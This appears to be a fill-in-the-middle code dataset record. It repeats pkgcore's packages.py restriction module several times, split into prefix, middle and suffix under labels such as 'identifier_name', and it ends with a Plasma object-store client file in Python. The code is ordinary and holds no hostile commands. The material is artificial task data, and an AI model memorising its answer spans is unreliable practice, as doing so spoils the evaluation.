object.__setattr__(self, "_pull_attr_func", static_attrgetter(attr))
object.__setattr__(self, "_attr_split", attr.split("."))
def _pull_attr(self, pkg):
try:
return self._pull_attr_func(pkg)
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split):
raise
return klass.sentinel
def match(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
return self.restriction.match(attr) != self.negate
def _handle_exception(self, pkg, exc, attr_split):
if isinstance(exc, AttributeError):
if not self.ignore_missing:
logger.exception(
"failed getting attribute %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
eargs = [x for x in exc.args if isinstance(x, str)]
if any(x in attr_split for x in eargs):
return False
elif any("'%s'" % x in y for x in attr_split for y in eargs):
# this is fairly horrible; probably specific to cpython also.
# either way, does a lookup specifically for attr components
# in the string exception string, looking for 'attr' in the
# text.
# if it doesn't match, exception is thrown.
return False
logger.exception(
"caught unexpected exception accessing %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
return True
def force_False(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attr, attr)
return self.restriction.force_False(pkg, self.attr, attr)
def force_True(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attr, attr)
return self.restriction.force_True(pkg, self.attr, attr)
def __len__(self):
if not isinstance(self.restriction, boolean.base):
return 1
return len(self.restriction) + 1
def __hash__(self):
return hash((self.negate, self.attrs, self.restriction))
def __str__(self):
s = f"{self.attrs} "
if self.negate:
s += "not "
return s + str(self.restriction)
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r @%#8x>"
return string % (self.__class__.__name__, self.attr, self.restriction, id(self))
@property
def attr(self):
return ".".join(self._attr_split)
@property
def attrs(self):
return (self.attr,)
class PackageRestrictionMulti(PackageRestriction):
__slots__ = ()
__inst_caching__ = True
attr = None
def force_False(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attrs, attrs)
return self.restriction.force_False(pkg, self.attrs, attrs)
def force_True(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attrs, attrs)
return self.restriction.force_True(pkg, self.attrs, attrs)
@property
def attrs(self):
return tuple(".".join(x) for x in self._attr_split)
def _parse_attr(self, attrs):
object.__setattr__(
self, "_pull_attr_func", tuple(map(static_attrgetter, attrs))
)
object.__setattr__(self, "_attr_split", tuple(x.split(".") for x in attrs))
def _pull_attr(self, pkg):
val = []
try:
for attr_func in self._pull_attr_func:
val.append(attr_func(pkg))
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split[len(val)]):
raise
return klass.sentinel
return val
__hash__ = PackageRestriction.__hash__
__eq__ = PackageRestriction.__eq__
class Conditional(PackageRestriction, metaclass=generic_equality):
"""Base object representing a conditional package restriction.
Used to control whether a payload of restrictions are accessible or not.
"""
__slots__ = ("payload",)
__attr_comparison__ = ("__class__", "negate", "attr", "restriction", "payload")
conditional = True
# note that instance caching is turned off.
# rarely pays off for conditionals from a speed/mem comparison
def __init__(self, attr, childrestriction, payload, **kwds):
"""
:param attr: attr to match against
:param childrestriction: restriction to control whether or not the
payload is accessible
:param payload: payload data, whatever it may be.
:param kwds: additional args to pass to :obj:`PackageRestriction`
"""
PackageRestriction.__init__(self, attr, childrestriction, **kwds)
object.__setattr__(self, "payload", tuple(payload))
def __str__(self):
s = PackageRestriction.__str__(self)
payload = ", ".join(str(x) for x in self.payload)
return f"( Conditional: {s} payload: [ {payload} ] )"
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r payload=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r payload=%r @%#8x>"
return string % (
self.__class__.__name__,
self.attr,
self.restriction,
self.payload,
id(self),
)
def __iter__(self):
return iter(self.payload)
def __hash__(self):
return hash((self.attr, self.negate, self.restriction, self.payload))
def evaluate_conditionals(
self, parent_cls, parent_seq, enabled, tristate_locked=None
):
if tristate_locked is not None:
assert len(self.restriction.vals) == 1
val = list(self.restriction.vals)[0]
if val in tristate_locked:
# if val is forced true, but the check is
# negation ignore it
# if !mips != mips
if (val in enabled) == self.restriction.negate:
|
elif not self.restriction.match(enabled):
return
if self.payload:
boolean.AndRestriction(*self.payload).evaluate_conditionals(
parent_cls, parent_seq, enabled, tristate_locked
)
# "Invalid name" (pylint uses the module const regexp, not the class regexp)
# pylint: disable-msg=C0103
AndRestriction = restriction.curry_node_type(
boolean.AndRestriction, restriction.package_type
)
OrRestriction = restriction.curry_node_type(
boolean.OrRestriction, restriction.package_type
)
AlwaysBool = restriction.curry_node_type(
restriction.AlwaysBool, restriction.package_type
)
class KeyedAndRestriction(boolean.AndRestriction):
__inst_caching__ = True
type = restriction.package_type
def __init__(self, *a, **kwds):
key = kwds.pop("key", None)
tag = kwds.pop("tag", None)
boolean.AndRestriction.__init__(self, *a, **kwds)
object.__setattr__(self, "key", key)
object.__setattr__(self, "tag", tag)
def __str__(self):
boolean_str = boolean.AndRestriction.__str__(self)
if self.tag is None:
return boolean_str
return f"{self.tag} {boolean_str}"
AlwaysTrue = AlwaysBool(negate=True)
AlwaysFalse = AlwaysBool(negate=False)
| return | conditional_block |
packages.py | """
restriction classes designed for package level matching
"""
from snakeoil import klass
from snakeoil.compatibility import IGNORED_EXCEPTIONS
from snakeoil.klass import generic_equality, static_attrgetter
from ..log import logger
from . import boolean, restriction
class PackageRestriction(restriction.base, metaclass=generic_equality):
"""Package data restriction."""
__slots__ = (
"_pull_attr_func",
"_attr_split",
"restriction",
"ignore_missing",
"negate",
)
__attr_comparison__ = ("__class__", "negate", "_attr_split", "restriction")
__inst_caching__ = True
type = restriction.package_type
subtype = restriction.value_type
conditional = False
# Note a sentinel is used purely because the codepath that use it
# can get executed a *lot*, and setup/tear down of exception
# machinery can be surprisingly costly
# Careful: some methods (__eq__, __hash__, intersect) try to work
# for subclasses too. They will not behave as intended if a
# subclass adds attributes. So if you do that, override the
# methods.
def __init__(self, attr, childrestriction, negate=False, ignore_missing=True):
"""
:param attr: package attribute to match against
:param childrestriction: a :obj:`pkgcore.restrictions.values.base` instance
to pass attr to for matching
:param negate: should the results be negated?
"""
if not childrestriction.type == self.subtype:
raise TypeError("restriction must be of type %r" % (self.subtype,))
sf = object.__setattr__
sf(self, "negate", negate)
self._parse_attr(attr)
sf(self, "restriction", childrestriction)
sf(self, "ignore_missing", ignore_missing)
def _parse_attr(self, attr):
object.__setattr__(self, "_pull_attr_func", static_attrgetter(attr))
object.__setattr__(self, "_attr_split", attr.split("."))
def _pull_attr(self, pkg):
try:
return self._pull_attr_func(pkg)
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split):
raise
return klass.sentinel
def match(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
return self.restriction.match(attr) != self.negate
def _handle_exception(self, pkg, exc, attr_split):
if isinstance(exc, AttributeError):
if not self.ignore_missing:
logger.exception(
"failed getting attribute %s from %s, " "exception %s",
".".join(attr_split),
str(pkg), | str(exc),
)
eargs = [x for x in exc.args if isinstance(x, str)]
if any(x in attr_split for x in eargs):
return False
elif any("'%s'" % x in y for x in attr_split for y in eargs):
# this is fairly horrible; probably specific to cpython also.
# either way, does a lookup specifically for attr components
# in the string exception string, looking for 'attr' in the
# text.
# if it doesn't match, exception is thrown.
return False
logger.exception(
"caught unexpected exception accessing %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
return True
def force_False(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attr, attr)
return self.restriction.force_False(pkg, self.attr, attr)
def force_True(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attr, attr)
return self.restriction.force_True(pkg, self.attr, attr)
def __len__(self):
if not isinstance(self.restriction, boolean.base):
return 1
return len(self.restriction) + 1
def __hash__(self):
return hash((self.negate, self.attrs, self.restriction))
def __str__(self):
s = f"{self.attrs} "
if self.negate:
s += "not "
return s + str(self.restriction)
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r @%#8x>"
return string % (self.__class__.__name__, self.attr, self.restriction, id(self))
@property
def attr(self):
return ".".join(self._attr_split)
@property
def attrs(self):
return (self.attr,)
class PackageRestrictionMulti(PackageRestriction):
__slots__ = ()
__inst_caching__ = True
attr = None
def force_False(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attrs, attrs)
return self.restriction.force_False(pkg, self.attrs, attrs)
def force_True(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attrs, attrs)
return self.restriction.force_True(pkg, self.attrs, attrs)
@property
def attrs(self):
return tuple(".".join(x) for x in self._attr_split)
def _parse_attr(self, attrs):
object.__setattr__(
self, "_pull_attr_func", tuple(map(static_attrgetter, attrs))
)
object.__setattr__(self, "_attr_split", tuple(x.split(".") for x in attrs))
def _pull_attr(self, pkg):
val = []
try:
for attr_func in self._pull_attr_func:
val.append(attr_func(pkg))
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split[len(val)]):
raise
return klass.sentinel
return val
__hash__ = PackageRestriction.__hash__
__eq__ = PackageRestriction.__eq__
class Conditional(PackageRestriction, metaclass=generic_equality):
"""Base object representing a conditional package restriction.
Used to control whether a payload of restrictions are accessible or not.
"""
__slots__ = ("payload",)
__attr_comparison__ = ("__class__", "negate", "attr", "restriction", "payload")
conditional = True
# note that instance caching is turned off.
# rarely pays off for conditionals from a speed/mem comparison
def __init__(self, attr, childrestriction, payload, **kwds):
"""
:param attr: attr to match against
:param childrestriction: restriction to control whether or not the
payload is accessible
:param payload: payload data, whatever it may be.
:param kwds: additional args to pass to :obj:`PackageRestriction`
"""
PackageRestriction.__init__(self, attr, childrestriction, **kwds)
object.__setattr__(self, "payload", tuple(payload))
def __str__(self):
s = PackageRestriction.__str__(self)
payload = ", ".join(str(x) for x in self.payload)
return f"( Conditional: {s} payload: [ {payload} ] )"
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r payload=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r payload=%r @%#8x>"
return string % (
self.__class__.__name__,
self.attr,
self.restriction,
self.payload,
id(self),
)
def __iter__(self):
return iter(self.payload)
def __hash__(self):
return hash((self.attr, self.negate, self.restriction, self.payload))
def evaluate_conditionals(
self, parent_cls, parent_seq, enabled, tristate_locked=None
):
if tristate_locked is not None:
assert len(self.restriction.vals) == 1
val = list(self.restriction.vals)[0]
if val in tristate_locked:
# if val is forced true, but the check is
# negation ignore it
# if !mips != mips
if (val in enabled) == self.restriction.negate:
return
elif not self.restriction.match(enabled):
return
if self.payload:
boolean.AndRestriction(*self.payload).evaluate_conditionals(
parent_cls, parent_seq, enabled, tristate_locked
)
# "Invalid name" (pylint uses the module const regexp, not the class regexp)
# pylint: disable-msg=C0103
AndRestriction = restriction.curry_node_type(
boolean.AndRestriction, restriction.package_type
)
OrRestriction = restriction.curry_node_type(
boolean.OrRestriction, restriction.package_type
)
AlwaysBool = restriction.curry_node_type(
restriction.AlwaysBool, restriction.package_type
)
class KeyedAndRestriction(boolean.AndRestriction):
__inst_caching__ = True
type = restriction.package_type
def __init__(self, *a, **kwds):
key = kwds.pop("key", None)
tag = kwds.pop("tag", None)
boolean.AndRestriction.__init__(self, *a, **kwds)
object.__setattr__(self, "key", key)
object.__setattr__(self, "tag", tag)
def __str__(self):
boolean_str = boolean.AndRestriction.__str__(self)
if self.tag is None:
return boolean_str
return f"{self.tag} {boolean_str}"
AlwaysTrue = AlwaysBool(negate=True)
AlwaysFalse = AlwaysBool(negate=False) | random_line_split | |
packages.py | """
restriction classes designed for package level matching
"""
from snakeoil import klass
from snakeoil.compatibility import IGNORED_EXCEPTIONS
from snakeoil.klass import generic_equality, static_attrgetter
from ..log import logger
from . import boolean, restriction
class PackageRestriction(restriction.base, metaclass=generic_equality):
"""Package data restriction."""
__slots__ = (
"_pull_attr_func",
"_attr_split",
"restriction",
"ignore_missing",
"negate",
)
__attr_comparison__ = ("__class__", "negate", "_attr_split", "restriction")
__inst_caching__ = True
type = restriction.package_type
subtype = restriction.value_type
conditional = False
# Note a sentinel is used purely because the codepath that use it
# can get executed a *lot*, and setup/tear down of exception
# machinery can be surprisingly costly
# Careful: some methods (__eq__, __hash__, intersect) try to work
# for subclasses too. They will not behave as intended if a
# subclass adds attributes. So if you do that, override the
# methods.
def __init__(self, attr, childrestriction, negate=False, ignore_missing=True):
"""
:param attr: package attribute to match against
:param childrestriction: a :obj:`pkgcore.restrictions.values.base` instance
to pass attr to for matching
:param negate: should the results be negated?
"""
if not childrestriction.type == self.subtype:
raise TypeError("restriction must be of type %r" % (self.subtype,))
sf = object.__setattr__
sf(self, "negate", negate)
self._parse_attr(attr)
sf(self, "restriction", childrestriction)
sf(self, "ignore_missing", ignore_missing)
def _parse_attr(self, attr):
object.__setattr__(self, "_pull_attr_func", static_attrgetter(attr))
object.__setattr__(self, "_attr_split", attr.split("."))
def _pull_attr(self, pkg):
try:
return self._pull_attr_func(pkg)
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split):
raise
return klass.sentinel
def match(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
return self.restriction.match(attr) != self.negate
def _handle_exception(self, pkg, exc, attr_split):
if isinstance(exc, AttributeError):
if not self.ignore_missing:
logger.exception(
"failed getting attribute %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
eargs = [x for x in exc.args if isinstance(x, str)]
if any(x in attr_split for x in eargs):
return False
elif any("'%s'" % x in y for x in attr_split for y in eargs):
# this is fairly horrible; probably specific to cpython also.
# either way, does a lookup specifically for attr components
# in the string exception string, looking for 'attr' in the
# text.
# if it doesn't match, exception is thrown.
return False
logger.exception(
"caught unexpected exception accessing %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
return True
def force_False(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attr, attr)
return self.restriction.force_False(pkg, self.attr, attr)
def force_True(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attr, attr)
return self.restriction.force_True(pkg, self.attr, attr)
def __len__(self):
if not isinstance(self.restriction, boolean.base):
return 1
return len(self.restriction) + 1
def __hash__(self):
return hash((self.negate, self.attrs, self.restriction))
def __str__(self):
s = f"{self.attrs} "
if self.negate:
s += "not "
return s + str(self.restriction)
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r @%#8x>"
return string % (self.__class__.__name__, self.attr, self.restriction, id(self))
@property
def attr(self):
return ".".join(self._attr_split)
@property
def attrs(self):
return (self.attr,)
class | (PackageRestriction):
__slots__ = ()
__inst_caching__ = True
attr = None
def force_False(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attrs, attrs)
return self.restriction.force_False(pkg, self.attrs, attrs)
def force_True(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attrs, attrs)
return self.restriction.force_True(pkg, self.attrs, attrs)
@property
def attrs(self):
return tuple(".".join(x) for x in self._attr_split)
def _parse_attr(self, attrs):
object.__setattr__(
self, "_pull_attr_func", tuple(map(static_attrgetter, attrs))
)
object.__setattr__(self, "_attr_split", tuple(x.split(".") for x in attrs))
def _pull_attr(self, pkg):
val = []
try:
for attr_func in self._pull_attr_func:
val.append(attr_func(pkg))
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split[len(val)]):
raise
return klass.sentinel
return val
__hash__ = PackageRestriction.__hash__
__eq__ = PackageRestriction.__eq__
class Conditional(PackageRestriction, metaclass=generic_equality):
"""Base object representing a conditional package restriction.
Used to control whether a payload of restrictions are accessible or not.
"""
__slots__ = ("payload",)
__attr_comparison__ = ("__class__", "negate", "attr", "restriction", "payload")
conditional = True
# note that instance caching is turned off.
# rarely pays off for conditionals from a speed/mem comparison
def __init__(self, attr, childrestriction, payload, **kwds):
"""
:param attr: attr to match against
:param childrestriction: restriction to control whether or not the
payload is accessible
:param payload: payload data, whatever it may be.
:param kwds: additional args to pass to :obj:`PackageRestriction`
"""
PackageRestriction.__init__(self, attr, childrestriction, **kwds)
object.__setattr__(self, "payload", tuple(payload))
def __str__(self):
s = PackageRestriction.__str__(self)
payload = ", ".join(str(x) for x in self.payload)
return f"( Conditional: {s} payload: [ {payload} ] )"
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r payload=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r payload=%r @%#8x>"
return string % (
self.__class__.__name__,
self.attr,
self.restriction,
self.payload,
id(self),
)
def __iter__(self):
return iter(self.payload)
def __hash__(self):
return hash((self.attr, self.negate, self.restriction, self.payload))
def evaluate_conditionals(
self, parent_cls, parent_seq, enabled, tristate_locked=None
):
if tristate_locked is not None:
assert len(self.restriction.vals) == 1
val = list(self.restriction.vals)[0]
if val in tristate_locked:
# if val is forced true, but the check is
# negation ignore it
# if !mips != mips
if (val in enabled) == self.restriction.negate:
return
elif not self.restriction.match(enabled):
return
if self.payload:
boolean.AndRestriction(*self.payload).evaluate_conditionals(
parent_cls, parent_seq, enabled, tristate_locked
)
# "Invalid name" (pylint uses the module const regexp, not the class regexp)
# pylint: disable-msg=C0103
AndRestriction = restriction.curry_node_type(
boolean.AndRestriction, restriction.package_type
)
OrRestriction = restriction.curry_node_type(
boolean.OrRestriction, restriction.package_type
)
AlwaysBool = restriction.curry_node_type(
restriction.AlwaysBool, restriction.package_type
)
class KeyedAndRestriction(boolean.AndRestriction):
__inst_caching__ = True
type = restriction.package_type
def __init__(self, *a, **kwds):
key = kwds.pop("key", None)
tag = kwds.pop("tag", None)
boolean.AndRestriction.__init__(self, *a, **kwds)
object.__setattr__(self, "key", key)
object.__setattr__(self, "tag", tag)
def __str__(self):
boolean_str = boolean.AndRestriction.__str__(self)
if self.tag is None:
return boolean_str
return f"{self.tag} {boolean_str}"
AlwaysTrue = AlwaysBool(negate=True)
AlwaysFalse = AlwaysBool(negate=False)
| PackageRestrictionMulti | identifier_name |
packages.py | """
restriction classes designed for package level matching
"""
from snakeoil import klass
from snakeoil.compatibility import IGNORED_EXCEPTIONS
from snakeoil.klass import generic_equality, static_attrgetter
from ..log import logger
from . import boolean, restriction
class PackageRestriction(restriction.base, metaclass=generic_equality):
"""Package data restriction."""
__slots__ = (
"_pull_attr_func",
"_attr_split",
"restriction",
"ignore_missing",
"negate",
)
__attr_comparison__ = ("__class__", "negate", "_attr_split", "restriction")
__inst_caching__ = True
type = restriction.package_type
subtype = restriction.value_type
conditional = False
# Note a sentinel is used purely because the codepath that use it
# can get executed a *lot*, and setup/tear down of exception
# machinery can be surprisingly costly
# Careful: some methods (__eq__, __hash__, intersect) try to work
# for subclasses too. They will not behave as intended if a
# subclass adds attributes. So if you do that, override the
# methods.
def __init__(self, attr, childrestriction, negate=False, ignore_missing=True):
"""
:param attr: package attribute to match against
:param childrestriction: a :obj:`pkgcore.restrictions.values.base` instance
to pass attr to for matching
:param negate: should the results be negated?
"""
if not childrestriction.type == self.subtype:
raise TypeError("restriction must be of type %r" % (self.subtype,))
sf = object.__setattr__
sf(self, "negate", negate)
self._parse_attr(attr)
sf(self, "restriction", childrestriction)
sf(self, "ignore_missing", ignore_missing)
def _parse_attr(self, attr):
object.__setattr__(self, "_pull_attr_func", static_attrgetter(attr))
object.__setattr__(self, "_attr_split", attr.split("."))
def _pull_attr(self, pkg):
try:
return self._pull_attr_func(pkg)
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split):
raise
return klass.sentinel
def match(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
return self.restriction.match(attr) != self.negate
def _handle_exception(self, pkg, exc, attr_split):
if isinstance(exc, AttributeError):
if not self.ignore_missing:
logger.exception(
"failed getting attribute %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
eargs = [x for x in exc.args if isinstance(x, str)]
if any(x in attr_split for x in eargs):
return False
elif any("'%s'" % x in y for x in attr_split for y in eargs):
# this is fairly horrible; probably specific to cpython also.
# either way, does a lookup specifically for attr components
# in the string exception string, looking for 'attr' in the
# text.
# if it doesn't match, exception is thrown.
return False
logger.exception(
"caught unexpected exception accessing %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
return True
def force_False(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attr, attr)
return self.restriction.force_False(pkg, self.attr, attr)
def force_True(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attr, attr)
return self.restriction.force_True(pkg, self.attr, attr)
def __len__(self):
if not isinstance(self.restriction, boolean.base):
return 1
return len(self.restriction) + 1
def __hash__(self):
return hash((self.negate, self.attrs, self.restriction))
def __str__(self):
s = f"{self.attrs} "
if self.negate:
s += "not "
return s + str(self.restriction)
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r @%#8x>"
return string % (self.__class__.__name__, self.attr, self.restriction, id(self))
@property
def attr(self):
return ".".join(self._attr_split)
@property
def attrs(self):
return (self.attr,)
class PackageRestrictionMulti(PackageRestriction):
__slots__ = ()
__inst_caching__ = True
attr = None
def force_False(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attrs, attrs)
return self.restriction.force_False(pkg, self.attrs, attrs)
def force_True(self, pkg):
|
@property
def attrs(self):
return tuple(".".join(x) for x in self._attr_split)
def _parse_attr(self, attrs):
object.__setattr__(
self, "_pull_attr_func", tuple(map(static_attrgetter, attrs))
)
object.__setattr__(self, "_attr_split", tuple(x.split(".") for x in attrs))
def _pull_attr(self, pkg):
val = []
try:
for attr_func in self._pull_attr_func:
val.append(attr_func(pkg))
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split[len(val)]):
raise
return klass.sentinel
return val
__hash__ = PackageRestriction.__hash__
__eq__ = PackageRestriction.__eq__
class Conditional(PackageRestriction, metaclass=generic_equality):
"""Base object representing a conditional package restriction.
Used to control whether a payload of restrictions are accessible or not.
"""
__slots__ = ("payload",)
__attr_comparison__ = ("__class__", "negate", "attr", "restriction", "payload")
conditional = True
# note that instance caching is turned off.
# rarely pays off for conditionals from a speed/mem comparison
def __init__(self, attr, childrestriction, payload, **kwds):
"""
:param attr: attr to match against
:param childrestriction: restriction to control whether or not the
payload is accessible
:param payload: payload data, whatever it may be.
:param kwds: additional args to pass to :obj:`PackageRestriction`
"""
PackageRestriction.__init__(self, attr, childrestriction, **kwds)
object.__setattr__(self, "payload", tuple(payload))
def __str__(self):
s = PackageRestriction.__str__(self)
payload = ", ".join(str(x) for x in self.payload)
return f"( Conditional: {s} payload: [ {payload} ] )"
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r payload=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r payload=%r @%#8x>"
return string % (
self.__class__.__name__,
self.attr,
self.restriction,
self.payload,
id(self),
)
def __iter__(self):
return iter(self.payload)
def __hash__(self):
return hash((self.attr, self.negate, self.restriction, self.payload))
def evaluate_conditionals(
self, parent_cls, parent_seq, enabled, tristate_locked=None
):
if tristate_locked is not None:
assert len(self.restriction.vals) == 1
val = list(self.restriction.vals)[0]
if val in tristate_locked:
# if val is forced true, but the check is
# negation ignore it
# if !mips != mips
if (val in enabled) == self.restriction.negate:
return
elif not self.restriction.match(enabled):
return
if self.payload:
boolean.AndRestriction(*self.payload).evaluate_conditionals(
parent_cls, parent_seq, enabled, tristate_locked
)
# "Invalid name" (pylint uses the module const regexp, not the class regexp)
# pylint: disable-msg=C0103
AndRestriction = restriction.curry_node_type(
boolean.AndRestriction, restriction.package_type
)
OrRestriction = restriction.curry_node_type(
boolean.OrRestriction, restriction.package_type
)
AlwaysBool = restriction.curry_node_type(
restriction.AlwaysBool, restriction.package_type
)
class KeyedAndRestriction(boolean.AndRestriction):
__inst_caching__ = True
type = restriction.package_type
def __init__(self, *a, **kwds):
key = kwds.pop("key", None)
tag = kwds.pop("tag", None)
boolean.AndRestriction.__init__(self, *a, **kwds)
object.__setattr__(self, "key", key)
object.__setattr__(self, "tag", tag)
def __str__(self):
boolean_str = boolean.AndRestriction.__str__(self)
if self.tag is None:
return boolean_str
return f"{self.tag} {boolean_str}"
AlwaysTrue = AlwaysBool(negate=True)
AlwaysFalse = AlwaysBool(negate=False)
| attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attrs, attrs)
return self.restriction.force_True(pkg, self.attrs, attrs) | identifier_body |
plasma.py | import os
import random
import socket
import subprocess
import time
import libplasma
PLASMA_ID_SIZE = 20
PLASMA_WAIT_TIMEOUT = 2 ** 30
class PlasmaBuffer(object):
"""This is the type of objects returned by calls to get with a PlasmaClient.
We define our own class instead of directly returning a buffer object so that
we can add a custom destructor which notifies Plasma that the object is no
longer being used, so the memory in the Plasma store backing the object can
potentially be freed.
Attributes:
buffer (buffer): A buffer containing an object in the Plasma store.
plasma_id (PlasmaID): The ID of the object in the buffer.
plasma_client (PlasmaClient): The PlasmaClient that we use to communicate
with the store and manager.
"""
def __init__(self, buff, plasma_id, plasma_client):
"""Initialize a PlasmaBuffer."""
self.buffer = buff
self.plasma_id = plasma_id
self.plasma_client = plasma_client
def __del__(self):
"""Notify Plasma that the object is no longer needed.
If the plasma client has been shut down, then don't do anything.
"""
if self.plasma_client.alive:
libplasma.release(self.plasma_client.conn, self.plasma_id)
def __getitem__(self, index):
"""Read from the PlasmaBuffer as if it were just a regular buffer."""
return self.buffer[index]
def __setitem__(self, index, value):
"""Write to the PlasmaBuffer as if it were just a regular buffer.
This should fail because the buffer should be read only.
"""
self.buffer[index] = value
def __len__(self):
"""Return the length of the buffer."""
return len(self.buffer)
class PlasmaClient(object):
"""The PlasmaClient is used to interface with a plasma store and a plasma manager.
The PlasmaClient can ask the PlasmaStore to allocate a new buffer, seal a
buffer, and get a buffer. Buffers are referred to by object IDs, which are
strings.
"""
def __init__(self, store_socket_name, manager_socket_name=None, release_delay=64):
"""Initialize the PlasmaClient.
Args:
store_socket_name (str): Name of the socket the plasma store is listening at.
manager_socket_name (str): Name of the socket the plasma manager is listening at.
"""
self.alive = True
if manager_socket_name is not None:
self.conn = libplasma.connect(store_socket_name, manager_socket_name, release_delay)
else:
self.conn = libplasma.connect(store_socket_name, "", release_delay)
def shutdown(self):
"""Shutdown the client so that it does not send messages.
If we kill the Plasma store and Plasma manager that this client is connected
to, then we can use this method to prevent the client from trying to send
messages to the killed processes.
"""
if self.alive:
libplasma.disconnect(self.conn)
self.alive = False
def create(self, object_id, size, metadata=None):
"""Create a new buffer in the PlasmaStore for a particular object ID.
The returned buffer is mutable until seal is called.
Args:
object_id (str): A string used to identify an object.
size (int): The size in bytes of the created buffer.
metadata (buffer): An optional buffer encoding whatever metadata the user
wishes to encode.
"""
# Turn the metadata into the right type.
metadata = bytearray("") if metadata is None else metadata
buff = libplasma.create(self.conn, object_id, size, metadata)
return PlasmaBuffer(buff, object_id, self)
def get(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block. The retrieved
buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[0]
return PlasmaBuffer(buff, object_id, self)
def get_metadata(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block until the object
has been sealed. The retrieved buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[1]
return PlasmaBuffer(buff, object_id, self)
def contains(self, object_id):
"""Check if the object is present and has been sealed in the PlasmaStore.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.contains(self.conn, object_id)
def seal(self, object_id):
"""Seal the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been sealed, the buffer is immutable and can only be
accessed through get.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.seal(self.conn, object_id)
def delete(self, object_id):
"""Delete the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been deleted, the buffer is no longer accessible.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.delete(self.conn, object_id)
def evict(self, num_bytes):
"""Evict some objects until to recover some bytes.
Recover at least num_bytes bytes if possible.
Args:
num_bytes (int): The number of bytes to attempt to recover.
"""
return libplasma.evict(self.conn, num_bytes)
